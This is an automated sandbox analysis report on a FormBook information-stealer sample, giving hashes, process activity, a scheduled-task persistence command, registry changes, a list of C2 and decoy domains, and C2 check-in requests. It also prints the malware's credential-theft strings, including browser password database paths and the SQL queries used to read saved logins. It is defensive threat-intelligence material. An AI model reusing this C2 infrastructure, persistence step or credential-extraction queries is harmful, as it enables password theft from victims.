| File name: | ee7dd9158f6175700aa6d58f346036f949889f8deebf8dbee83c40874bbc1f26.exe |
| Full analysis: | https://app.any.run/tasks/f5dca767-ded5-494d-9d74-8b2d68af39fe |
| Verdict: | Malicious activity |
| Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
| Analysis date: | July 27, 2024, 17:26:08 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
| MD5: | 01FBCC6559C010E59BE1DC7B66C12E4F |
| SHA1: | 657F058D4032447658F71265803F7A6D52A64532 |
| SHA256: | EE7DD9158F6175700AA6D58F346036F949889F8DEEBF8DBEE83C40874BBC1F26 |
| SSDEEP: | 24576:W2TRhstm8oKNe/1UJWS1OAX64OchZA4KRPcdMsC8xYfVpO/aZNlBI:XTRhs88oKNe/1UJWS1OAX64OchZA4KRC |
| .exe | | | Generic CIL Executable (.NET, Mono, etc.) (63.1) |
|---|---|---|
| .exe | | | Win64 Executable (generic) (23.8) |
| .dll | | | Win32 Dynamic Link Library (generic) (5.6) |
| .exe | | | Win32 Executable (generic) (3.8) |
| .exe | | | Generic Win/DOS Executable (1.7) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2024:07:26 07:08:24+00:00 |
| ImageFileCharacteristics: | Executable, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 48 |
| CodeSize: | 572416 |
| InitializedDataSize: | 2048 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x8da46 |
| OSVersion: | 4 |
| ImageVersion: | - |
| SubsystemVersion: | 4 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 1.0.1.0 |
| ProductVersionNumber: | 1.0.1.0 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | Neutral |
| CharacterSet: | Unicode |
| Comments: | - |
| CompanyName: | - |
| FileDescription: | PopupControl |
| FileVersion: | 1.0.1.0 |
| InternalName: | dKJy.exe |
| LegalCopyright: | Copyright © 2014 |
| LegalTrademarks: | - |
| OriginalFileName: | dKJy.exe |
| ProductName: | PopupControl |
| ProductVersion: | 1.0.1.0 |
| AssemblyVersion: | 1.0.1.0 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 892 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | schtasks.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1296 | "C:\Windows\SysWOW64\cscript.exe" | C:\Windows\SysWOW64\cscript.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Version: 5.812.10240.16384 Modules
Formbook(PID) Process(1296) cscript.exe C2www.dunia188j.store/gy15/ Strings (79)USERNAME LOCALAPPDATA USERPROFILE APPDATA TEMP ProgramFiles CommonProgramFiles ALLUSERSPROFILE /c copy " /c del " \Run \Policies \Explorer \Registry\User \Registry\Machine \SOFTWARE\Microsoft\Windows\CurrentVersion Office\15.0\Outlook\Profiles\Outlook\ NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ \SOFTWARE\Mozilla\Mozilla \Mozilla Username: Password: formSubmitURL usernameField encryptedUsername encryptedPassword \logins.json \signons.sqlite \Microsoft\Vault\ SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins \Google\Chrome\User Data\Default\Login Data SELECT origin_url, username_value, password_value FROM logins .exe .com .scr .pif .cmd .bat ms win gdi mfc vga igfx user help config update regsvc chkdsk systray audiodg certmgr autochk taskhost colorcpl services IconCache ThumbCache Cookies SeDebugPrivilege SeShutdownPrivilege \BaseNamedObjects config.php POST HTTP/1.1 Host: Connection: close Content-Length: Cache-Control: no-cache Origin: http:// User-Agent: Mozilla Firefox/4.0 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http:// Accept-Language: en-US Accept-Encoding: gzip, deflate
dat= f-start f-end Decoy C2 (64)yb40w.top 286live.com poozonlife.com availableweedsonline.com 22926839.com petlovepet.fun halbaexpress.com newswingbd.com discountdesh.com jwoalhbn.xyz dandevonald.com incrediblyxb.christmas ailia.pro ga3ki3.com 99812.photos richiecom.net ummahskills.online peakleyva.store a1cbloodtest.com insurancebygarry.com onz-cg3.xyz erektiepil.com hs-steuerberater.info 20allhen.online mariaslakedistrict.com losterrrcossmpm.com tmb6x.rest bagelsliders.com njoku.net tatoways.com jmwmanglobalsolutionscom.com midnightemporium.shop gunaihotels.com midsouthhealthcare.com rtptt80.site carmen-asa.com gypsyjudyscott.com djkleel.com sophhia.site tqqft8l5.xyz 00050385.xyz oiupa.xyz purenutrixion.com worldinfopedia.com 8886493.com 1e0bfijiz43k6c8.skin bunkerlabsgolf.com twinportslocal.com ttyijlaw.com poiulkj.top yuejiazy888.com betbox2347.com gettingcraftywitro.com mantap303game.icu skillspartner.net cbla.info rs-alohafactorysaleuua.shop bt365434.com redrivercompany.store abc8win5.com 46431.club vivehogar.net menloparkshop.com 1776biz.live | |||||||||||||||
| 1912 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2132 | "C:\Users\admin\Desktop\ee7dd9158f6175700aa6d58f346036f949889f8deebf8dbee83c40874bbc1f26.exe" | C:\Users\admin\Desktop\ee7dd9158f6175700aa6d58f346036f949889f8deebf8dbee83c40874bbc1f26.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Description: PopupControl Exit code: 0 Version: 1.0.1.0 Modules
| |||||||||||||||
| 2508 | /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" | C:\Windows\SysWOW64\cmd.exe | — | cscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3488 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4544 | "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\admin\AppData\Local\Temp\tmp4ADB.tmp" | C:\Windows\SysWOW64\schtasks.exe | — | ee7dd9158f6175700aa6d58f346036f949889f8deebf8dbee83c40874bbc1f26.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5016 | C:\WINDOWS\Explorer.EXE | C:\Windows\explorer.exe | — | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 10.0.19041.3758 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7032 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | — | ee7dd9158f6175700aa6d58f346036f949889f8deebf8dbee83c40874bbc1f26.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft .NET Services Installation Utility Exit code: 0 Version: 4.8.9037.0 built by: NET481REL1 Modules
| |||||||||||||||
| 7076 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | — | ee7dd9158f6175700aa6d58f346036f949889f8deebf8dbee83c40874bbc1f26.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft .NET Services Installation Utility Exit code: 4294967295 Version: 4.8.9037.0 built by: NET481REL1 Modules
| |||||||||||||||
| (PID) Process: | (2132) ee7dd9158f6175700aa6d58f346036f949889f8deebf8dbee83c40874bbc1f26.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2132) ee7dd9158f6175700aa6d58f346036f949889f8deebf8dbee83c40874bbc1f26.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (2132) ee7dd9158f6175700aa6d58f346036f949889f8deebf8dbee83c40874bbc1f26.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (2132) ee7dd9158f6175700aa6d58f346036f949889f8deebf8dbee83c40874bbc1f26.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2132 | ee7dd9158f6175700aa6d58f346036f949889f8deebf8dbee83c40874bbc1f26.exe | C:\Users\admin\AppData\Roaming\KfYvtUBOq.exe | executable | |
MD5:01FBCC6559C010E59BE1DC7B66C12E4F | SHA256:EE7DD9158F6175700AA6D58F346036F949889F8DEEBF8DBEE83C40874BBC1F26 | |||
| 2132 | ee7dd9158f6175700aa6d58f346036f949889f8deebf8dbee83c40874bbc1f26.exe | C:\Users\admin\AppData\Local\Temp\tmp4ADB.tmp | xml | |
MD5:45FE1378EE9A78389A72E13633D5F407 | SHA256:971AD7B926A4CB1FDA675D6BF34FE1443864E22D58071EF0950D6B6FA4D3B510 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5016 | explorer.exe | GET | — | 198.49.23.144:80 | http://www.richiecom.net/gy15/?7nNL=YbR846mhflpTm&XVKdQ=TTZR2wlr/MxrhzX+SnaLsdUlltp/1vbiq4YxRT2RTMceCDutU9TRczaT3ju4hBXy0WhA | unknown | — | — | whitelisted |
5016 | explorer.exe | GET | — | 206.188.193.146:80 | http://www.cbla.info/gy15/?7nNL=YbR846mhflpTm&XVKdQ=N/r7kI863h9bLFUDwfuMD4dYv13loHpQbf0O8wCFz2ETvEDvy8EkwFUOlO9FqHyhy+lj | unknown | — | — | unknown |
— | — | POST | 500 | 40.91.76.224:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | — |
— | — | POST | 200 | 51.104.15.253:443 | https://self.events.data.microsoft.com/OneCollector/1.0/ | unknown | binary | 9 b | — |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
6572 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 131.253.33.254:443 | a-ring-fallback.msedge.net | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
— | — | 92.123.104.34:443 | www.bing.com | Akamai International B.V. | DE | unknown |
6012 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
3992 | slui.exe | 40.91.76.224:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
5860 | RUXIMICS.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 40.91.76.224:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
3952 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
6012 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
Domain | IP | Reputation |
|---|---|---|
t-ring-fdv2.msedge.net |
| unknown |
settings-win.data.microsoft.com |
| whitelisted |
a-ring-fallback.msedge.net |
| unknown |
www.bing.com |
| whitelisted |
google.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
www.tqqft8l5.xyz |
| unknown |
www.dunia188j.store |
| unknown |
www.richiecom.net |
| unknown |
www.twinportslocal.com |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
5016 | explorer.exe | Malware Command and Control Activity Detected | ET MALWARE FormBook CnC Checkin (GET) |
5016 | explorer.exe | Malware Command and Control Activity Detected | ET MALWARE FormBook CnC Checkin (GET) |